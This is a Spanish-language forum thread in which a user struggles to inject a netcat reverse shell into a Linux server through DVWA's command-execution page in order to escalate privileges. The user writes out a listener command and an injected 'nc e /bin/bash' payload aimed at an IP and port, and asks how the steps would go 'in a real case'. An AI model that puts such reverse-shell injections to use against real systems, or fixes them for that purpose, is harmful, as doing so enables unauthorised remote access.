Proceso de subir una Shell Inversa para hacer una escalada de privilegios

Iniciado por cybersthl, 29 Agosto 2018, 20:48 PM

0 Miembros y 1 Visitante están viendo este tema.

cybersthl

Buenas tardes a todos,

Llevo semanas intentando subir una shellinversa a un servidor linux, para hacer una escalada de privilegios, pero no entiendo bien el proceso de como hacerlo, y en la mayoría de los tutoriales que veo, lo hacen con DVWA por medio de las vulnerabilidades webs que existen en el servidor, ya sea con php, nc, imagen... pero no consigo lograrlo,  :-( :-( :-( pero la shell siempre se ejecuta en el servidor local, y sí, he llegado a establecer una conexión, pero no me sirve de nada porque es en la máquina local donde tengo el kali... haciendo las pruebas.

Alguien, podría echarme un cable, please... y no al cuello jjaja que de eso, ya estoy apunto de hacerlo yo.. jajajaj

PD: Es todo meramente didáctico, nada de hacer el mal a nadie :)

Gracias y buen día!

aangrymasther

¿Estas seguro que el servidor tiene alguna vulnerabilidad que te permita subir una shell?
Probablemente el 99% de lo que digo sea incorrecto

cybersthl

Sí, el puerto 80 es vulnerable.
Instale en mi kali, DVWA para explotar esa vulnerabilidad e intentar subir una shell al servidor en cuestión, 228.128.

En el kali, abrí el puerto 8888
nc -lvp 8888

En la parte de ejecución de comandos en DVWA, puse lo sig:
192.168.228.128 nc e /bin/bash 192.168.228.128 8888

Con lo anterior, no se abre ninguna session.
Pero si pongo la ip de mi kali que es: la 135, si que funciona y saca la shell, pero la local, no me interesa esto, quiero saber como hacer para que se ejecute la shell en el servidor remoto 128.

Intenté usar un exploit y tampoco nada. (multi/script/web_delivery)
Solo me abra la shell en local de la kali, no del servidor 128.

Igual estoy haciendo algo mal, porque no termino de entender el proceso de ejecución de los comandos. Tendría que primero abrir el puerto para tenerlo a  la escucha, luego usar DVWA para injectar la shell y en teoría, nada más.

Agradecería si alguien me explciara el order correcto de ejecución en un caso real, usando el exploit o nc.

Gracias de antemano.
Saludos
Thelma.